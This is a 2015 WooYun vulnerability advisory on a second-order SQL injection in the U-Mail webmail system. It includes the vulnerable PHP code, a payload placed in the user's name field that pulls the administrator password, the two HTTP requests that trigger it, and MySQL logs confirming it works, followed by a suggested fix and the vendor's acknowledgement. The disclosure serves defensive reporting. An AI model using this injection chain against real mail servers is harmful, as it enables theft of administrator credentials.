当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-093376

漏洞标题:U-Mail邮件系统二次注入(不鸡肋,可直接获取管理员密码)

相关厂商:U-Mail

漏洞作者: Ano_Tom

提交时间:2015-01-22 23:02

修复时间:2015-04-22 23:04

公开时间:2015-04-22 23:04

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-22: 细节已通知厂商并且等待厂商处理中
2015-01-27: 厂商已经确认,细节仅向厂商公开
2015-01-30: 细节向第三方安全合作伙伴开放
2015-03-23: 细节向核心白帽子及相关领域专家公开
2015-04-02: 细节向普通白帽子公开
2015-04-12: 细节向实习白帽子公开
2015-04-22: 细节向公众公开

简要描述:

U-Mail别哭。另外wooyun-2010-093049更新了无需登录且可批量getshell的exp,随便测试了下,批量轻轻松松get几百个shell,很严重,望管理速审核 :)

详细说明:

漏洞文件
/client/oabshare/module/operates.php 代码

if ( ACTION == "save-to-pab" )
{
include_once( LIB_PATH."PAB.php" );
$PAB = PAB::getinstance( );
$maillist_id = gss( $_GET['maillist'] );
$maillist_id = intval( $maillist_id );
if ( $maillist_id )
{
......
}
else
{
$domain_id = gss( $_GET['domain_id'] );
$user_ids = gss( $_GET['userlist'] );
$user_ids = id_list_filter( $user_ids );//WooYun-2014-74928
if ( !$user_ids )
{
dump_msg( "param_error", "参数错误!" );
}
$where = "t1.UserID IN (".$user_ids.")";
$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );//首先是从数据库获取数据
$user_all = $arr_tmp['data'];
if ( !$user_all )
{
dump_json( array( "status" => TRUE, "message" => "" ) );
}
foreach ( $user_all as $user )
{
$qq = $msn = "";
if ( strpos( $user['qqmsn'], "@" ) )
{
$msn = $user['qqmsn'];
}
else
{
$qq = $user['qqmsn'];
}
if ( !$PAB->getContactByMail( $user_id, $user['email'], "contact_id", 0 ) )
{
$data = array(
"user_id" => $user_id,
"fullname" => $user['FullName'],//从数据库读取的字段内容
"pref_email" => $user['email'],
"pref_tel" => $user['teleextension'] ? $user['teleextension'] : $user['mobil'],
"birthday" => $user['birthday'],
"im_qq" => $qq,
"im_msn" => $msn,
"updated" => date( "Y-m-d H:i:s" )
);
$res = $PAB->add_contact( $data, 0 );//直接将读取的内容执行了add的操作
if ( !$res )
{
dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误,添加失败!" ) );
}
}
}
}
dump_json( array( "status" => TRUE, "message" => "" ) );
}


首先,需要引入二次注入的exp,引入文件如下
/client/option/module/o_userinfo.php

if ( ACTION == "userinfo" )
{
$url = make_link( "option", "view", "userinfo" );
$where = "UserID='".$user_id."'";
$data = array(
"FullName" => gss( $_POST['fullname'] ),//获得的数据存入数据库
"EnglishName" => gss( $_POST['englishname'] )
);
$result = $Mailbox->update_mailbox( $data, $where, 0 );
if ( !$result )
{
redirect( $url, "修改姓名时出现错误,修改失败!" );
}


将单引号等信息存入数据库,查看表结构,如下

a.png


长度为100足够读取敏感数据了首先登录用户,在修改个人资料处,中文名处填写
',`homepage`=(SELECT password from userlist where userid=2)#如图

b.png


保存后,查看自己用户的userid,请求为
http://mail.fuck.com/webmail/client/oab/index.php?module=operate&action=member-get&page=1&orderby=&is_reverse=1&keyword=test0006
如图

c.png


然后执行如下请求http://mail.fuck.com/webmail/client/oabshare/index.php?module=operate&action=save-to-pab&domain_id=1&userlist=9
userlist为自己的userid,domain_id默认都为1执行完毕后,点击个人通讯录,如图

d.png


空白处,system帐号的密码如图

e.png


f.png


两步的sql执行情况如下

150122 15:54:44	 2665 Connect	umail@localhost on 
2665 Query SET NAMES 'UTF8'
2665 Init DB umail
2665 Query UPDATE userlist SET `FullName`='\',`homepage`=(SELECT password from userlist where userid=2)#',`EnglishName`='' WHERE UserID='9'
2665 Query UPDATE mailuserinfo SET `sex`='0',`birthday`='0000-00-00',`mobil`='',`teleextension`='',`extnum`='',`qqmsn`='',`worknum`='',`memo`='',`o_group`='' WHERE UserID='9'
2665 Quit


以及

150122 15:57:16	 2668 Connect	umail@localhost on 
2668 Query SET NAMES 'UTF8'
2668 Init DB umail
2668 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (8)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2668 Query SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
FROM userlist as t1, mailuserinfo as t2
WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (8)
ORDER BY t1.OrderNo DESC,t1.Mailbox ASC
2668 Query SELECT contact_id FROM pab_contact WHERE user_id='9' AND pref_email='test0005@fuck.com' LIMIT 1
2668 Query INSERT INTO pab_contact SET `user_id`='9',`fullname`='',`homepage`=(SELECT password from userlist where userid=2)#',`pref_email`='test0005@fuck.com',`pref_tel`='',`birthday`='0000-00-00',`im_qq`='',`im_msn`='',`updated`='2015-01-22 15:57:16'
2668 Quit

漏洞证明:

如上

修复方案:

出库后,继续入库前也要进行相应的转义等处理

版权声明:转载请注明来源 Ano_Tom@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2015-01-27 11:12

厂商回复:

CNVD确认所述情况,已经由CNVD通过以往建立的处置渠道向软件生产厂商通报。

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-23 10:35 | cnssr4bb1t ( 路人 | Rank:4 漏洞数:2 | 优美。)

    人家好像不太愿意搭理你了

  2. 2015-01-23 11:25 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @cnssr4bb1t 估计不爱了。。

  3. 2015-01-23 11:33 | menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)

    你妹,哥的二次注入就是小厂商

  4. 2015-01-23 11:56 | Ano_Tom ( 普通白帽子 | Rank:368 漏洞数:40 | Talk is cheap.:)

    @menmen519 不是,你的二次注入我看了的,你那个字段长度是20,也就能引入user()好像,应该还获取不到密码等信息,你测测看看是不是